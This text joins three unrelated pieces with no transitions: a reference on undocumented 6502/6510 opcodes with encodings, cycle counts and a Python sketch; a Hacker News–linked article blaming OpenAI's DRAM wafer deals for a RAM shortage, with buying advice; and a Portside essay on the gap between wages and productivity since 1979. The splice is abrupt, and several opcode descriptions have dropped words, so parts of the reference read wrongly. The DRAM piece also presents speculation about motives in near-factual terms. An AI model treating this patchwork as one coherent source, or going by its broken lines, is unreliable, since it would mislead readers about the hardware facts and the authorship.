Cycles= 6 RRA abcd,X ;7F cd ab ; 7 RRA abcd,Y ;7B cd ab ; 7 RRA ab ;67 ab ; 5 RRA ab,X ;77 ab ; 6 RRA (ab,X) ;63 ab ; 8 RRA (ab),Y ;73 ab ; 8 (Sub-instructions: ADC, ROR) Example: RRA $030C ;6F 0C 03 Equivalent instructions: ROR $030C ADC $030C AXS *** (SAX) AXS ANDs the contents of the A and X registers (without changing the contents of either register) and stores the result in memory. AXS does not affect any flags in the processor status register. Supported modes: AXS abcd ;8F cd ab ;No. Cycles= 4 AXS ab ;87 ab ; 3 AXS ab,Y ;97 ab ; 4 AXS (ab,X) ;83 ab ; 6 (Sub-instructions: STA, STX) Example: AXS $FE ;87 FE Here's the same code using equivalent instructions. STX $FE PHA AND $FE STA $FE PLA LAX *** This opcode loads both the accumulator and the X register with the contents of a memory location. Supported modes: LAX abcd ;AF cd ab ;No. Cycles= 4 LAX abcd,Y ;BF cd ab ; 4* LAX ab ;A7 ab ;*=add 1 3 LAX ab,Y ;B7 ab ;if page 4 LAX (ab,X) ;A3 ab ;boundary 6 LAX (ab),Y ;B3 ab ;is crossed 5* (Sub-instructions: LDA, LDX) Example: LAX $8400,Y ;BF 00 84 Equivalent instructions: LDA $8400,Y LDX $8400,Y DCM *** (DCP) This opcode DECs the contents of a memory location and then CMPs the result with the A register. Supported modes: DCM abcd ;CF cd ab ;No. Cycles= 6 DCM abcd,X ;DF cd ab ; 7 DCM abcd,Y ;DB cd ab ; 7 DCM ab ;C7 ab ; 5 DCM ab,X ;D7 ab ; 6 DCM (ab,X) ;C3 ab ; 8 DCM (ab),Y ;D3 ab ; 8 (Sub-instructions: CMP, DEC) Example: DCM $FF ;C7 FF Equivalent instructions: DEC $FF CMP $FF INS *** (ISC) This opcode INCs the contents of a memory location and then SBCs the result from the A register. Supported modes: INS abcd ;EF cd ab ;No. Cycles= 6 INS abcd,X ;FF cd ab ; 7 INS abcd,Y ;FB cd ab ; 7 INS ab ;E7 ab ; 5 INS ab,X ;F7 ab ; 6 INS (ab,X) ;E3 ab ; 8 INS (ab),Y ;F3 ab ; 8 (Sub-instructions: SBC, INC) Example: INS $FF ;E7 FF Equivalent instructions: INC $FF SBC $FF ALR *** This opcode ANDs the contents of the A register with an immediate value and then LSRs the result. One supported mode: ALR #ab ;4B ab ;No. Cycles= 2 Example: ALR #$FE ;4B FE Equivalent instructions: AND #$FE LSR A ARR *** This opcode ANDs the contents of the A register with an immediate value and then RORs the result. One supported mode: ARR #ab ;6B ab ;No. Cycles= 2 Here's an example of how you might write it in a program. ARR #$7F ;6B 7F Here's the same code using equivalent instructions. AND #$7F ROR A XAA *** XAA transfers the contents of the X register to the A register and then ANDs the A register with an immediate value. One supported mode: XAA #ab ;8B ab ;No. Cycles= 2 Example: XAA #$44 ;8B 44 Equivalent instructions: TXA AND #$44 OAL *** This opcode ORs the A register with #$EE, ANDs the result with an immediate value, and then stores the result in both A and X. One supported mode: OAL #ab ;AB ab ;No. Cycles= 2 Here's an example of how you might use this opcode: OAL #$AA ;AB AA Here's the same code using equivalent instructions: ORA #$EE AND #$AA TAX SAX *** SAX ANDs the contents of the A and X registers (leaving the contents of A intact), subtracts an immediate value, and then stores the result in X. ... A few points might be made about the action of subtracting an immediate value. It actually works just like the CMP instruction, except that CMP does not store the result of the subtraction it performs in any register. This subtract operation is not affected by the state of the Carry flag, though it does affect the Carry flag. It does not affect the Overflow flag. One supported mode: SAX #ab ;CB ab ;No. 
Cycles= 2 Example: SAX #$5A ;CB 5A Equivalent instructions: STA $02 TXA AND $02 SEC SBC #$5A TAX LDA $02 Note: Memory location $02 would not be altered by the SAX opcode. NOP *** NOP performs no operation. Opcodes: 1A, 3A, 5A, 7A, DA, FA. Takes 2 cycles to execute. SKB *** SKB stands for skip next byte. Opcodes: 80, 82, C2, E2, 04, 14, 34, 44, 54, 64, 74, D4, F4. Takes 2, 3, or 4 cycles to execute. SKW *** SKW skips next word (two bytes). Opcodes: 0C, 1C, 3C, 5C, 7C, DC, FC. Takes 4 cycles to execute. To be dizzyingly precise, SKW actually performs a read operation. It's just that the value read is not stored in any register. Further, opcode 0C uses the absolute addressing mode. The two bytes which follow it form the absolute address. All the other SKW opcodes use the absolute indexed X addressing mode. If a page boundary is crossed, the execution time of one of these SKW opcodes is upped to 5 clock cycles. -------------------------------------------------------------------------- The following opcodes were discovered and named exclusively by the author. (Or so it was thought before.) HLT *** HLT crashes the microprocessor. When this opcode is executed, program execution ceases. No hardware interrupts will execute either. The author has characterized this instruction as a halt instruction since this is the most straightforward explanation for this opcode's behaviour. Only a reset will restart execution. This opcode leaves no trace of any operation performed! No registers affected. Opcodes: 02, 12, 22, 32, 42, 52, 62, 72, 92, B2, D2, F2. TAS *** This opcode ANDs the contents of the A and X registers (without changing the contents of either register) and transfers the result to the stack pointer. It then ANDs that result with the contents of the high byte of the target address of the operand +1 and stores that final result in memory. One supported mode: TAS abcd,Y ;9B cd ab ;No. Cycles= 5 (Sub-instructions: STA, TXS) Here is an example of how you might use this opcode: TAS $7700,Y ;9B 00 77 Here is the same code using equivalent instructions. STX $02 PHA AND $02 TAX TXS AND #$78 STA $7700,Y PLA LDX $02 Note: Memory location $02 would not be altered by the TAS opcode. Above I used the phrase 'the high byte of the target address of the operand +1'. By the words target address, I mean the unindexed address, the one specified explicitly in the operand. The high byte is then the second byte after the opcode (ab). So we'll shorten that phrase to AB+1. SAY *** This opcode ANDs the contents of the Y register with and stores the result in memory. One supported mode: SAY abcd,X ;9C cd ab ;No. Cycles= 5 Example: SAY $7700,X ;9C 00 77 Equivalent instructions: PHA TYA AND #$78 STA $7700,X PLA XAS *** This opcode ANDs the contents of the X register with and stores the result in memory. One supported mode: XAS abcd,Y ;9E cd ab ;No. Cycles= 5 Example: XAS $6430,Y ;9E 30 64 Equivalent instructions: PHA TXA AND #$65 STA $6430,Y PLA AXA *** This opcode stores the result of A AND X AND the high byte of the target address of the operand +1 in memory. Supported modes: AXA abcd,Y ;9F cd ab ;No. Cycles= 5 AXA (ab),Y ;93 ab ; 6 Example: AXA $7133,Y ;9F 33 71 Equivalent instructions: STX $02 PHA AND $02 AND #$72 STA $7133,Y PLA LDX $02 Note: Memory location $02 would not be altered by the AXA opcode. The following notes apply to the above four opcodes: TAS, SAY, XAS, AXA. None of these opcodes affect the accumulator, the X register, the Y register, or the processor status register! 
The author has no explanation for the complexity of these instructions. It is hard to comprehend how the microprocessor could handle the convoluted sequence of events which appears to occur while executing one of these opcodes. A partial explanation for what is going on is that these instructions appear to be corruptions of other instructions. For example, the opcode SAY would have been one of the addressing modes of the standard instruction STY (absolute indexed X) were it not for the fact that the normal operation of this instruction is impaired in this particular instance. One irregularity uncovered is that sometimes the actual value is stored in memory, and the AND with part drops off (ex. SAY becomes true STY). This happens very infrequently. The behaviour appears to be connected with the video display. For example, it never seems to occur if either the screen is blanked or C128 2MHz mode is enabled. --- Imported example --- Here is a demo program to illustrate the above effect. SYS 8200 to try it. There is no exit, so you'll have to hit Stop-Restore to quit. And you may want to clear the screen before running it. For contrast, there is a second routine which runs during idle state display. Use SYS 8211 for it. After trying the second routine, check it out again using POKE 53269,255 to enable sprites. begin 640 say->sty D"""B`*`@G``%Z$P,("P1T##[+!'0$/NB`*`@G``%Z-#Z3!,@ ` end --- Text import end --- WARNING: If the target address crosses a page boundary because of indexing, the instruction may not store at the intended address. It may end up storing in zero page, or another address altogether (page=value stored). Apparently certain internal 65XX registers are being overridden. The whole scheme behind this erratic behaviour is very complex and strange. And continuing with the list... ANC *** ANC ANDs the contents of the A register with an immediate value and then moves bit 7 of A into the Carry flag. This opcode works basically identically to AND #immed. except that the Carry flag is set to the same state that the Negative flag is set to. One supported mode: ANC #ab ;2B ab ;No. Cycles= 2 ANC #ab ;0B ab (Sub-instructions: AND, ROL) OPCODE 89 Opcode 89 is another SKB instruction. It requires 2 cycles to execute. LAS *** This opcode ANDs the contents of a memory location with the contents of the stack pointer register and stores the result in the accumulator, the X register, and the stack pointer. Affected flags: N Z. One supported mode: LAS abcd,Y ;BB cd ab ;No. Cycles= 4* OPCODE EB Opcode EB seems to work exactly like SBC #immediate. Takes 2 cycles. That is the end of the list. This list is a full and complete list of all undocumented opcodes, every last hex value. It provides complete and thorough information and it also corrects some incorrect information found elsewhere. The opcodes MKA and MKX (also known as TSTA and TSTX) as described in "The Complete Commodore Inner Space Anthology" do not exist. Also, it is erroneously indicated there that the instructions ASO, RLA, LSE, RRA have an immediate addressing mode. (RLA #ab would be ANC #ab.) [Recent additions to this text file] Here are some other more scrutinizing observations. The opcode ARR operates more complexily than actually described in the list above. Here is a brief rundown on this. The following assumes the decimal flag is clear. You see, the sub-instruction for ARR ($6B) is in fact ADC ($69), not AND. While ADC is not performed, some of the ADC mechanics are evident. Like ADC, ARR affects the overflow flag. 
The following effects occur after ANDing but before RORing. The V flag is set to the result of exclusive ORing bit 7 with bit 6. Unlike ROR, bit 0 does not go into the carry flag. The state of bit 7 is exchanged with the carry flag. Bit 0 is lost. All of this may appear strange, but it makes sense if you consider the probable internal operations of ADC itself. SKB opcodes 82, C2, E2 may be HLTs. Since only one source claims this, and no other sources corroborate this, it must be true on very few machines. On all others, these opcodes always perform no operation. LAS is suspect. This opcode is possibly unreliable. OPCODE BIT-PATTERN: 10x0 1011 Now it is time to discuss XAA ($8B) and OAL ($AB). A fair bit of controversy has surrounded these two opcodes. There are two good reasons for this. 1 - They are rather weird in operation. 2 - They do operate differently on different machines. Highly variable. Here is the basic operation. OAL This opcode ORs the A register with #xx, ANDs the result with an immediate value, and then stores the result in both A and X. On my 128, xx may be EE,EF,FE, OR FF. These possibilities appear to depend on three factors: the X register, PC, and the previous instruction executed. Bit 0 is ORed from x, and also from PCH. As for XAA, on my 128 this opcode appears to work exactly as described in the list. On my 64, OAL produces all sorts of values for xx: 00,04,06,80, etc... A rough scenario I worked out to explain this is here. The constant value EE disappears entirely. Instead of ORing with EE, the accumulator is ORed with certain bits of X and also ORed with certain bits of another "register" (nature unknown, whether it be the data bus, or something else). However, if OAL is preceded by certain other instructions like NOP, the constant value EE reappears and the foregoing does not take place. On my 64, XAA works like this. While X is transfered to A, bit 0 and bit 4 are not. Instead, these bits are ANDed with those bits from A, and the result is stored in A. There may be many variations in the behaviour of both opcodes. XAA #$00 or OAL #$00 are likely quite reliable in any case. It seems clear that the video chip (i.e., VIC-II) bears responsibility for some small part of the anomalousness, at least. Beyond that, the issue is unclear. One idea I'll just throw up in the air about why the two opcodes behave as they do is this observation. While other opcodes like 4B and 6B perform AND as their first step, 8B and AB do not. Perhaps this difference leads to some internal conflict in the microprocessor. Besides being subject to "noise", the actual base operations do not vary. All of the opcodes in this list (at least up to the dividing line) use the naming convention from the CCISA Anthology book. There is another naming convention used, for example in the first issue of C=Hacking. The only assembler I know of that supports undocumented opcodes is Power Assembler. And it uses the same naming conventions as used here. One note on a different topic. A small error has been pointed out in the 64 Programmers Reference Guide with the instruction set listing. In the last row, in the last column of the two instructions AND and ORA there should be an asterisk, just as there is with ADC. That is the indirect,Y addressing mode. In another table several pages later correct information is given. (A correction: There was one error in this document originally. One addressing mode for LAX was given as LAX ab,X. This should have been LAX ab,Y (B7). 
Also note that Power Assembler apparently has this same error, likely because both it and this document derive first from the same source as regards these opcodes. Coding LAX $00,X is accepted and produces the output B7 00.) References o Joel Shepherd. "Extra Instructions" COMPUTE!, October 1983. o Jim Butterfield. "Strange Opcodes" COMPUTE, March 1993. o Raymond Quirling. "6510 Opcodes" The Transactor, March 1986. o John West, Marko M�kel�. '64doc' file, 1994/06/03.
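To make the "two instructions fused into one" pattern concrete, here is a minimal Python sketch of what ASO/SLO does to a memory byte, the accumulator, and the C/N/Z flags. It is a simplified illustration (no cycle counting, no addressing-mode logic), not a cycle-accurate emulation.

    # Minimal model of the ASO/SLO illegal opcode: ASL the memory byte,
    # then ORA the shifted value into the accumulator.

    def aso(mem: bytearray, addr: int, a: int, flags: dict) -> int:
        value = mem[addr]
        flags["C"] = bool(value & 0x80)   # ASL moves bit 7 into Carry
        value = (value << 1) & 0xFF       # shift left, keep 8 bits
        mem[addr] = value
        a |= value                        # ORA the result into A
        flags["N"] = bool(a & 0x80)
        flags["Z"] = a == 0
        return a

    mem = bytearray(256)
    mem[0x10] = 0x41
    flags = {"C": False, "N": False, "Z": False}
    a = aso(mem, 0x10, a=0x08, flags=flags)
    print(f"A=${a:02X} mem=${mem[0x10]:02X} flags={flags}")  # A=$8A mem=$82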

Sam Altman's Dirty DRAM Deal

Hacker News
www.mooreslawisdead.com
2025-12-06 00:24:55
Comments...
Original Article

Or: How the AI Bubble, Panic, and Unpreparedness Stole Christmas

Written by Tom of Moore’s Law Is Dead

Special Assistance by KarbinCry & kari-no-sugata


Introduction — The Day the RAM Market Snapped


At the beginning of November, I ordered a 32GB DDR5 kit for pairing with a Minisforum BD790i X3D motherboard, and three weeks later those very same sticks of DDR5 are now listed for a staggering $330 – a 156% increase in price from less than a month ago! At this rate, it seems likely that by Christmas, that DDR5 kit alone could be worth more than the entire Zen 4 X3D platform I planned to pair it with! How could this happen, and more specifically – how could this happen THIS quickly? Well, buckle up! I am about to tell you the story of Sam Altman’s Dirty DRAM Deal, or: How the AI bubble, panic, and unpreparedness stole Christmas...
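As a quick sanity check on that jump (the early-November price below is inferred from the stated percentage, not quoted anywhere in this piece):

    # Back out the implied early-November price from the stated 156% increase.
    new_price = 330.0
    increase = 1.56                        # a 156% rise
    old_price = new_price / (1 + increase)
    print(f"implied starting price: ${old_price:.0f}")  # roughly $129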

But before I dive in, let me make it clear that my RAM kit’s 156% jump in price isn’t a fluke or some extreme example of what’s going on right now. Nope – in fact, I’d like to provide two more examples of how impossible it is becoming to get hold of RAM; these were provided by a couple of our sources within the industry:

  1. One source, who works at a US retailer, stated that a RAM manufacturer called them to ask whether they might buy RAM from them to stock up for their other customers. This would be like Corsair asking a Best Buy if they had any RAM around.

  2. Another source, who works at a prebuilt PC company, was recently given an estimate for when they would receive RAM orders if they placed them now…and they were told December…of 2026!

So what happened?  Well, it all comes down to three perfectly synergistic events:

  1. OpenAI executed two unprecedented RAM deals that took everyone by surprise.

  2. The secrecy and size of the deals triggered full-scale panic buying from everyone else.

  3. The market had almost zero safety stock left due to tariffs, worry about decreasing RAM prices over the summer, and stalled equipment transfers.

Below, we’re going to walk through each of these factors — and then I’m going to warn you about which hardware categories will be hit the hardest, which products are already being cancelled, and what you should buy right now before the shelves turn into a repeat of 2021–2022...because this is doomed to turn into much more than just RAM scarcity...

Part I — OpenAI Wasn’t Very “Open”


On October 1st OpenAI signed two simultaneous deals with Samsung and SK Hynix for 40% of the world’s DRAM supply. Now, did OpenAI’s competition suspect some big RAM deals could be signed in late 2025? Yes. Ok, but did they think it would be deals this huge and with multiple companies? NO! In fact, if you go back and read reporting on Sam Altman’s now infamous trip to South Korea on October 1st, even mere hours before the massive deals with Samsung and SK Hynix were simultaneously signed, most reporting simply mentioned vague talk of Sam meeting with Samsung, SK Hynix, TSMC, and Foxconn. The reporting at the time was soft, almost dismissive — “exploring ties,” “seeking cooperation,” “probing for partnerships.” Nobody hinted that OpenAI was about to swallow up to 40% of global DRAM output – even on the morning before it happened! Nobody saw this coming. This is clear in the lack of reporting about the deals before they were announced, and every MLID source who works in DRAM manufacturing and distribution insists this took everyone in the industry by surprise.

To be clear - the shock wasn’t that OpenAI made a big deal, no, it was that they made two massive deals this big , at the same time, with Samsung and SK Hynix simultaneously ! In fact, according to our sources - both companies had no idea how big each other's deal was, nor how close to simultaneous they were. And this secrecy mattered. It mattered a lot.

Had Samsung known SK Hynix was about to commit a similar chunk of supply — or vice-versa — the pricing and terms would have likely been different. It’s entirely conceivable they wouldn’t have both agreed to supply such a substantial part of global supply if they had known more... but at the end of the day - OpenAI did succeed in keeping the circles tight, locking down the NDAs, and leveraging the fact that these companies assumed the other wasn’t giving up this much wafer volume simultaneously…in order to make a surgical strike on the global RAM supply chain…and it's worked so far...

Part II — Instant Panic: How did we miss this?


Imagine you’re running a hyperscaler, or maybe you’re a major OEM, or perhaps pretend that you are simply one of OpenAI’s chief competitors: On October 1st of 2025, you would have woken up to the news that OpenAI had just cornered the memory market more aggressively than any company in the last decade, and you hadn’t heard even a murmur that this was coming beforehand! You would probably make some follow-up calls to colleagues in the industry, and then quickly hear rumors that it wasn’t just you – even the two largest suppliers didn’t see each other’s simultaneous cooperation with OpenAI coming! You wouldn’t go: “Well, that’s an interesting coincidence”; no, you would say: “WHAT ELSE IS GOING ON THAT WE DON’T KNOW ABOUT?”

Again – it’s not the size of the deals that’s solely the issue here; it’s also their unexpectedness and brazenness. On October 1st, Silicon Valley executives and procurement managers panicked over concerns like these:

  • What other deals don’t we know about? Is this just the first of many?

  • None of our DRAM suppliers warned us ahead of time! We have to assume they also won't in the future, and that it’s possible all of global DRAM could be bought up without us getting a single warning!

  • We know OpenAI’s competitors are already panic-buying!  If we don’t move now, we might be locked out of the market until 2028!

OpenAI’s competitors, OEMs, and cloud providers scrambled to secure whatever inventory remained out of self-defense, and self-defense in a world that was entirely defenseless due to the accelerant I’ll now explain in Part III...

Part III — There Wasn't any Safety Stock


Normally, the DRAM market has buffers: warehouses of emergency stock, excess wafer starts, older DRAM manufacturing machinery being sold off to budget brands while the big brands upgrade their production lines…but not in 2025. In 2025, those would-be buffers were depleted for three separate reasons:

  1. Tariff Chaos. Companies had deliberately reduced how much DRAM they ordered for their safety stock over the summer of 2025 because tariffs were changing almost weekly. Every RAM purchase risked being made at the wrong moment – and so fewer purchases were made.

  2. Prices had been falling all summer. Because of the hesitancy to purchase as much safety stock as usual, RAM prices were also genuinely falling over time. And obviously, when memory is getting cheaper month over month, the last thing you feel is pressure to buy a commodity that could be cheaper the next month…so everyone waited.

  3. Secondary RAM Manufacturing Had Stalled. Budget brands normally buy older DRAM fabrication equipment from mega-producers like Samsung when Samsung upgrades their DRAM lines to the latest and greatest equipment. This allows the DRAM market to expand more than it otherwise would, because upgrades to the fanciest production lines remain additive to total market capacity. However, Korean memory firms have been terrified that reselling old equipment to China-adjacent OEMs might trigger U.S. retaliation…and so those machines have been sitting idle in warehouses since early spring.

Yep, there was no cushion. OpenAI hit the market at the exact moment it was least prepared.

Part IV — Artificial Scarcity


And now time for the biggest twist of all, a twist that’s actually public information , and therefore should be getting discussed by far more people in this writer's opinion: OpenAI isn’t even bothering to buy finished memory modules! No, their deals are unprecedentedly only for raw wafers — uncut, unfinished, and not even allocated to a specific DRAM standard yet. It’s not even clear if they have decided yet on how or when they will finish them into RAM sticks or HBM!  Right now it seems like these wafers will just be stockpiled in warehouses – like a kid who hides the toybox because they’re afraid nobody wants to play with them, and thus selfishly feels nobody but them should get the toys!

And let’s just say it: here is the uncomfortable truth Sam Altman is always loath to admit in interviews: OpenAI is worried about losing its lead. The last 18 months have seen competitors catching up fast — Anthropic, Meta, xAI, and Google, whose Gemini 3 specifically has gotten a ton of praise just in the past week. Everyone’s chasing training capacity. Everyone needs memory. DRAM is the lifeblood of scaling inference and training throughput. Cutting supply to your rivals is not a conspiracy theory. It’s a business tactic as old as business itself. And so, when you consider how secretive OpenAI was about their deals with Samsung and SK Hynix, and additionally how unready they were to immediately utilize their warehouses of DRAM wafers – it sure seems like a primary goal of these deals was to deprive the market, and not just an attempt to protect OpenAI’s own supply…

Part V — What will be cancelled? What should you buy now?


Alright, now that we are done explaining the how, let’s get to the “now what?” – because even if the RAM shortage miraculously improves immediately behind the scenes – even if the AI Bubble instantly popped or 10 companies started tooling up for more DRAM capacity this second (and many are, to be fair) – at a minimum the next six to nine months are already screwed. See above: DRAM manufacturers are quoting 13-month lead times for DDR5! This is not a temporary blip. This could be a once-in-a-generation shock. So what gets hit first? What gets hit hardest? Well, below is an E- through S-tier ranking of which products are “the most screwed”:

  • S-Tier (Already Screwed – Too Late to Buy)

    • RAM itself, obviously. RAM prices have “exploded”. The detonation is in the past.

  • A-Tier (Almost Screwed – Don’t Wait to Buy!!!)

    • SSDs. These tend to follow DRAM pricing with a lag.

    • Small Prebuilt PC Companies that lack large buffers of inventory.

    • RADEON GPUs. AMD doesn’t bundle RAM in their BOM kits to AIBs the way Nvidia does. In fact, the RX 9070 GRE 16GB this channel leaked months ago is almost certainly cancelled, according to our sources.

    • XBOX. Microsoft didn’t plan. Prices may rise and/or supply may dwindle in 2026.

  • B-Tier (Eventually Screwed – Don’t wait much longer to buy!)

    • Nvidia GPUs. Nvidia maintains large memory inventories for its board partners, giving them a buffer. But high-capacity GPUs (like a hypothetical 24GB 5080 SUPER) are on ice for now because those stores were never sufficiently built up. In fact, Nvidia is quietly telling partners that their SUPER refresh “might” launch Q3 2026 – although most partners think it’s just a placeholder for when Nvidia expects new capacity to come online, and thus SUPER may never launch.

  • C-Tier (Think about buying soon)

    • Laptops and phones. These companies negotiate immense long-term contracts, so they’re not hit immediately. But once their stockpiles run dry, watch out!

  • D-Tier (Consider buying soon, but there’s no rush)

    • PlayStation. Sony planned better than almost anyone else. They bought aggressively during the summer price trough, which is why they can afford a Black Friday discount while everyone else is raising prices.

  • E-Tier (Prices might actually drop )

    • Anything without RAM. Specifically CPUs that do not come with coolers could see price drops over time since there could be a drop in demand for CPUs if nobody has the RAM to feed them in systems.

  • ???-Tier — Steam Machine. Valve keeps things quiet, but the big unknown is whether they pre-bought RAM months ago before announcing their much-hyped Steam Machine. If they did already stockpile an ample supply of DDR5, then the Steam Machine should launch fine, but supply could dry up temporarily at some point while they wait for prices to drop. However, if they didn’t plan ahead, expect a high launch price and very little resupply…it might even need to be cancelled, or there might need to be a variant offered without RAM included (BYO RAM Edition!).

And that’s it! This last bit was the most important part of the article in this writer’s opinion – an attempt at helping you avoid getting burned. Well, actually, there is one other important reason for this article’s existence I’ll tack onto the end – a hope that other people start digging into what’s going on at OpenAI. I mean seriously – do we even have a single reliable audit of their financials to back up their spending this outrageous amount of money… for this? Heck, I’ve even heard from numerous sources that OpenAI is “buying up the manufacturing equipment as well” – and without mountains of concrete proof, and/or more input from additional sources on what that really means…I don’t feel I can touch that hot potato without getting burned… but I hope someone else will…

Sources:

The $79 Trillion Heist

Portside
portside.org
2025-12-06 00:21:21
The $79 Trillion Heist barry Fri, 12/05/2025 - 19:21 ...
Original Article

If you depend on investments for most of your income, this is a pretty damn good time. The University of Michigan’s November survey of consumer sentiment finds that Americans who don’t own stock have their lowest confidence level in the economy since the survey began querying stock ownership in 1998. An exception to this mood, the survey notes, is found among the largest stock owners, whose assessment of the economy has actually risen by 11 percent this year.

As Emma Janssen has reported in these pages, marketers are going where the money is, like bank robber Willie Sutton. First-class and business-seat travel on the airlines is booming, so much so that seating arrangements on Delta and United are being reconfigured to create more room for the affluent, while coach seats are going unfilled and “discount” airlines struggle. Revenues are up 3 percent this year at the Ritz-Carltons, the Four Seasons, and other luxury hotels, yet down by 3 percent at economy hotels. And when it comes to life’s biggest purchase—a home—the median age of first-time buyers reached 40 this year, an all-time high according to the National Association of Realtors.

“All right,” as John Dos Passos wrote in his U.S.A. trilogy in the depth of the Depression, “we are two nations.”

Life in the nonaffluent nation is getting harder. According to a Brookings Institution analysis from last year, 43 percent of American families don’t earn enough to pay for housing, food, health care, child care, and transportation; every week, they must juggle which to pay and which not to pay. Among Black and Latino families, those figures rise to 59 percent and 66 percent, respectively.

It has not been ever thus. In the roughly 30 years following the end of World War II, the nation experienced an unprecedented period of broadly shared prosperity, with workers’ incomes rising in tandem with the nation’s growth in productivity. In 1947, workers captured 70 percent of the total national income; today, that has fallen to roughly 59 percent, while investment income has gained at workers’ expense. As a landmark 1995 study by economists Larry Mishel and Jared Bernstein for the Economic Policy Institute (EPI) revealed, a gap between the rise in productivity and the rise in median workers’ wages opened in the mid-1970s and has grown steadily wider since then; the difference between those two rates today is 55 percent. In the years between 1948 and 1979, when the egalitarian legacy of the New Deal was at its apogee, with high levels of unionization and progressive taxation and constraints on the financial sector, productivity grew by 108 percent and median worker’s compensation by 93 percent. In the years between 1979 and 2025, an EPI analysis found productivity grew by 87 percent but median worker’s compensation by a bare 33 percent.

The declining share of national income going to workers hasn’t entirely been the result of the shift from wage income to investment income. There’s also been a shift in the distribution of corporate income to the most highly paid employees, through stock options and other forms of compensation. A 2021 EPI study shows that between 1979 and 2019, real yearly wages for the bottom 90 percent of workers increased by 26 percent, while the wages of those in the 95th to 99th percentile increased by 75 percent, for those in the top 1 percent by 160 percent, and for those in the top 0.1 percent by 345 percent. Worker pay ratios over the past decade have shown that CEOs usually make about 300 times what their median-paid employee makes, a far cry from the 1960s, when the ratio was roughly 20-to-1. Even as labor unions have largely disappeared in the past 60 years, the union of American CEOs—routinely appointed to the executive compensation committees of corporate boards with the blessing or at the instigation of the CEO whose pay they’re setting—has retained its power, adhering to the creed that an injury to one CEO (by, say, paying him or her less than 300 times what workers make) is an injury to all.

What would America look like if the gap between worker pay and productivity hadn’t opened? A RAND Corporation study from earlier this year found that the bottom 90 percent of wage earners received about 67 percent of all taxable income in 1975. In 2019, the last year for which this data was available, they received 46.8 percent. Had that bottom 90 percent continued during the past half-century to make the same share of the national income they’d had in 1975, RAND calculates that by 2023 they would have made an additional $79 trillion. Just in the year 2023, they would have made an additional $3.9 trillion. As the size of the bottom 90 percent of the U.S. workforce is roughly 140 million people, that means that the average earner would have made about $28,000 more in 2023 than they actually did.

Where have all those missing $28,000 paychecks gone? Well, our nation was home to 1,135 billionaires this year, whose aggregate net worth in 2024 came to a cozy $5.7 trillion. That’s $1.8 trillion more than what it would take to cut 140 million $28,000 paychecks.
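A quick sanity check of those figures (my arithmetic, not the author's):

\[
\frac{\$3.9\ \text{trillion}}{140\ \text{million workers}} \approx \$27{,}857 \approx \$28{,}000,
\qquad
\$5.7\ \text{trillion} - 140\ \text{million} \times \$28{,}000 \approx \$5.7\text{T} - \$3.9\text{T} = \$1.8\ \text{trillion}.
\]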

Corporations aren’t cutting those checks. As EPI’s Nominal Wage Tracker documents, the 80 percent of corporate income that went to employees in 1980 declined to 71.5 percent this year.

This is the kind of thing that can irritate workers. As I write in mid-November, 3,200 members of the Machinists union have just completed a three-month strike at three Midwestern Boeing plants. Strikers noted that Boeing devoted $68 billion to stock buybacks between 2010 and 2024—funds that could have gone to developing safer and better planes, and better-compensated workers with more secure retirement benefits.

THERE’S A REASON WHY 1979 HAS BECOME the last “postwar normal” year, before the massive upward redistribution of wealth and income, in most of these economic studies. In 1980, Ronald Reagan was elected president. In his first few months in office, he signed a law reducing the top income tax rate from 70 percent to 50 percent. (It’s about ten points lower than that today, though most of our super-rich have found ways to get it much closer to zero.) The high marginal tax rates of the postwar decades, peaking at 91 percent during Republican Dwight Eisenhower’s presidency, had effectively put a ceiling on CEO pay. Tesla’s board would not be committing to pay Elon Musk a trillion bucks if Tesla thrives in the coming years under 1950s-era tax rates, where the feds would take the lion’s share above the top marginal bracket. The pre-Reagan tax rates ensured that America’s billionaires would be few and far between, helping to ensure that workers’ potential income wouldn’t be siphoned upward. Twenty years after Reagan, George W. Bush became the first president to lower taxes on the rich during wartime (a war he decided to start absent a plausible threat), and Donald Trump’s successive cuts make even Reagan and Bush look like Keynesians.

In 1982, Reagan’s appointees to the Securities and Exchange Commission (SEC) changed a rule that enabled shareholders to claim a greater percentage of corporate wealth. The SEC permitted corporate executives to authorize buybacks of the corporation’s stock, thereby raising the value of the remaining shares on the market. By the 1990s, due to a Clinton-era loophole exempting bonus compensation from corporate taxes, corporations began paying their top executives with shares and options of shares, which made buybacks an easy form of self-enrichment. As economist William Lazonick has exhaustively documented, by the 2000s, most major corporations were diverting more funds to buybacks and dividends than they were investing in growth and research, not to mention employees’ raises.

During his first year in office, Reagan also busted PATCO, the air traffic controllers’ union, firing all its members when they went on strike. (By contrast, Republican Richard Nixon had allowed the hundreds of thousands of postal workers who’d participated in a wildcat strike in 1970 to return to their jobs: The Republican Party of Nixon’s day was still closer to the accept-the-New-Deal ethos of Eisenhower than the overturn-the-New-Deal ethos of Reagan.) Reagan’s mass firing inspired private-sector CEOs to do the same with their own employees. During the next several years, a representative sample of leading corporations—Phelps Dodge, Greyhound Bus, Boise Cascade, International Paper, Hormel meatpacking—all slashed pay to provoke strikes, then fired the strikers and hired their replacements at a fraction of their original salaries.

During the years of postwar prosperity, strikes were a routine part of the economic landscape, and a major reason why worker pay constituted a decent share of the national income. After PATCO, they nearly disappeared. The number of major strikes plummeted from 286 a year in the 1960s and 1970s, to 83 a year in the 1980s, to 35 a year in the 1990s, to 20 a year in the 2000s. In recent years, the strike has enjoyed a modest revival—autoworkers and teaching assistants have won higher wages by walking picket lines—but unions have shrunk to the point that the fruits of such victories have limited ripple effects.

Reagan wasn’t the sole agent of upward redistribution during this time. Federal Reserve Chair Paul Volcker brought down inflation by raising interest rates so high that people stopped buying cars and construction projects slowed to a trickle. The industrial Midwest never recovered. Between 1979 and 1983, 2.4 million manufacturing jobs vanished. The number of U.S. steelworkers went from 450,000 at the start of the 1980s to 170,000 at decade’s end, even as the wages of those who remained shrank by 17 percent. The decline in auto manufacturing was even more precipitous, from 760,000 employees in 1978 to 490,000 three years later. These were the jobs whose union contracts had set the standard for the nation’s blue-collar workers.

Finally, also in 1981, at New York’s Pierre Hotel, Jack Welch, General Electric’s new CEO, delivered a kind of inaugural address, which he titled “Growing Fast in a Slow-Growth Economy.” GE, Welch proclaimed, would shed all its divisions that weren’t number one or number two in their markets. If that meant shedding workers, so be it. All that mattered was pushing the company to pre-eminence, and the measure of a company’s pre-eminence was its stock price. Between late 1980 and 1985, Welch reduced the number of GE employees from 411,000 to 299,000. He cut basic research. The company’s stock price soared. And Welch became the model CEO for a corporate America going fully neoliberal.

